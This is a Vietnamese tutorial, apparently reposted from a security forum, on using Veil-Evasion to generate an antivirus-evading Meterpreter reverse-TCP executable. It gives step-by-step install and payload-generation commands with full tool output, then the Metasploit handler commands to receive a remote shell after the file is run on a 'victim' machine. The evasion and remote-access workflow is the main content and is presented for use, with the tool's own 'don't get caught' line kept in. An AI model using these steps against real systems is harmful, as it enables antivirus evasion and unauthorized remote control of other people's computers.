Hướng dẫn dùng Veil tạo payload bypass antivirus
1. Veil là gì?
Veil được biết đến như là một công cụ có khả năng vượt qua những trình diệt virus cơ bản được dùng trong hoạt động pentesting. Veil làm việc này bằng cách tạo ra một payloads ngẫu nhiên và duy nhất.Chúng ta có thể so sánh những payloads này giống nhưng những malware đa hình, khác nhau giữa host này với host kia. Những payloads này hay hơn những malware truyền thống ở chỗ nó có khả năng thay đổi chữ ký – điều mà một chương trình diệt virus thường dùng (tất nhiên là chương trình diệt virus còn dùng cách khác) để xác định malware. Những mã khai thác của Veil tương thích với hầu hết những công cụ pentest như Metasploit.
2. Dùng như thế nào?
Bài này tác giả sử dụng Kali Linux làm máy tấn công và một máy tính khác chạy Windows XP SP2 với chương trình diệt virus ClamWin. Tác giả khẳng định nó hoạt động với các chương trình diệt virus cơ bản khác.
Bài này tác giả sử dụng Kali Linux làm máy tấn công và một máy tính khác chạy Windows XP SP2 với chương trình diệt virus ClamWin. Tác giả khẳng định nó hoạt động với các chương trình diệt virus cơ bản khác.
Đầu tiên là cài Veil vì nó không được tích hợp sẵn trên Kali Linux
root@kali:~# wget https://codeload.github.com/Veil-Framework/Veil-Evasion/zip/master
root@kali:~# unzip master
root@kali:~# cd Veil-Evasion-master/setup
root@kali:~/Veil-Evasion-master/setup# ./setup.sh
Chạy veil
root@kali:~/Veil-Evasion-master/setup# cd ..
root@kali:~/Veil-Evasion-master# ./Veil-Evasion.py
Bạn sẽ thấy một menu tương tác như thế này:
=========================================================================
Veil-Evasion | [Version]: 2.16.0
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================Main Menu39 payloads loadedAvailable commands:use use a specific payloadinfo information on a specific payloadlist list available payloadsupdate update Veil to the latest versionclean clean out payload folderscheckvt check payload hashes vs. VirusTotalexit exit Veil[>] Please enter a command:Dùng thử những command để hiểu hơn về Veil, ví dụ như list, info..
Veil-Evasion | [Version]: 2.16.0=========================================================================[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework=========================================================================Payload information:Name: python/meterpreter/rev_tcpLanguage: pythonRating: ExcellentDescription: pure windows/meterpreter/reverse_tcp stager, noshellcodeRequired Options:Name Current Value Description—- ————- ———–LHOST IP of the metasploit handlerLPORT 4444 Port of the metasploit handlercompile_to_exe Y Compile to an executableexpire_payload X Optional: Payloads expire after “X” daysuse_pyherion N Use the pyherion encrypter
Để dùng một payload thì bạn chọn command use và mã số payloads có được từ lệnh list
[>] Please enter a command: use 26=========================================================================Veil-Evasion | [Version]: 2.16.0=========================================================================[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework=========================================================================Payload: python/meterpreter/rev_tcp loadedRequired Options:Name Current Value Description—- ————- ———–LHOST IP of the metasploit handlerLPORT 4444 Port of the metasploit handlercompile_to_exe Y Compile to an executableexpire_payload X Optional: Payloads expire after “X” daysuse_pyherion N Use the pyherion encrypterAvailable commands:set set a specific option valueinfo show information about the payloadgenerate generate payloadback go to the main menuexit exit Veil[>] Please enter a command: set LHOST 192.168.0.14[>] Please enter a command: generate=========================================================================Veil-Evasion | [Version]: 2.16.0=========================================================================[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework=========================================================================[*] Press [enter] for ‘payload’[>] Please enter the base name for output files: testPayload[?] How would you like to create your payload executable?1 – Pyinstaller (default)2 – Pwnstaller (obfuscated Pyinstaller loader)3 – Py2Exe[>] Please enter the number of your choice: 1err:winediag:SECUR32_initNTLMSP ntlm_auth was not found or is outdated. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution.130 INFO: wrote Z:\root\Veil-Evasion-master\testPayload.spec176 INFO: Testing for ability to set icons, version resources…189 INFO: … resource update available191 INFO: UPX is not available.1707 INFO: checking Analysis1707 INFO: building Analysis because out00-Analysis.toc non existent1707 INFO: running Analysis out00-Analysis.toc1709 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable1717 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww …1717 INFO: Found manifest C:\windows\WinSxS\Manifests\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375.manifest1720 INFO: Searching for file msvcr90.dll1720 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcr90.dll1720 INFO: Searching for file msvcp90.dll1720 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcp90.dll1720 INFO: Searching for file msvcm90.dll1720 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcm90.dll1878 INFO: Analyzing Z:\opt\pyinstaller-2.0\support\_pyi_bootstrap.py3434 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\archive.py3625 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\carchive.py3832 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\iu.py3881 INFO: Analyzing /usr/share/veil-output/source/testPayload.py4082 INFO: Hidden import ‘encodings’ has been found otherwise4084 INFO: Looking for run-time hooks4084 INFO: Analyzing rthook Z:\opt\pyinstaller-2.0\support/rthooks/pyi_rth_encodings.py4904 INFO: Warnings written to Z:\root\Veil-Evasion-master\build\pyi.win32\testPayload\warntestPayload.txt4911 INFO: checking PYZ4911 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing4911 INFO: building PYZ out00-PYZ.toc5546 INFO: checking PKG5546 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing5546 INFO: building PKG out00-PKG.pkg6628 INFO: checking EXE6628 INFO: rebuilding out00-EXE.toc because testPayload.exe missing6628 INFO: building EXE from out00-EXE.toc6633 INFO: Appending archive to EXE Z:\root\Veil-Evasion-master\dist\testPayload.exe=========================================================================Veil-Evasion | [Version]: 2.16.0=========================================================================[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework=========================================================================[*] Executable written to: /usr/share/veil-output/compiled/testPayload.exeLanguage: pythonPayload: python/meterpreter/rev_tcpRequired Options: LHOST=192.168.0.14 LPORT=4444 compile_to_exe=Yexpire_payload=X use_pyherion=NPayload File: /usr/share/veil-output/source/testPayload.pyHandler File: /usr/share/veil-output/handlers/testPayload_handler.rc[*] Your payload files have been generated, don’t get caught![!] And don’t submit samples to any online scanner!
Nó nhắc các bạn là đừng có submit payload này lên mấy trang scan online kìa
Xong, như vậy bạn đã có 1 file exe có khả năng bypass được một số antivirus (hi vọng thế)
Bước tiếp theo là copy file đó lên máy victim và chạy nó. Trên Kali Linux chúng ta sẽ mở một cái handler cho cái reverse tcp
msf > use exploit/multi/handlermsf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST 192.168.0.14LHOST => 192.168.0.14msf exploit(handler) > set LPORT 4444LPORT => 4444msf exploit(handler) > set ExitOnSession falseExitOnSession => falsemsf exploit(handler) > exploit -j
Theo: http://forum.ceh.vn/Huong-dan-dung-Veil-tao-payload-bypass-antivirus-thread-7431-post-28093.ceh#pid28093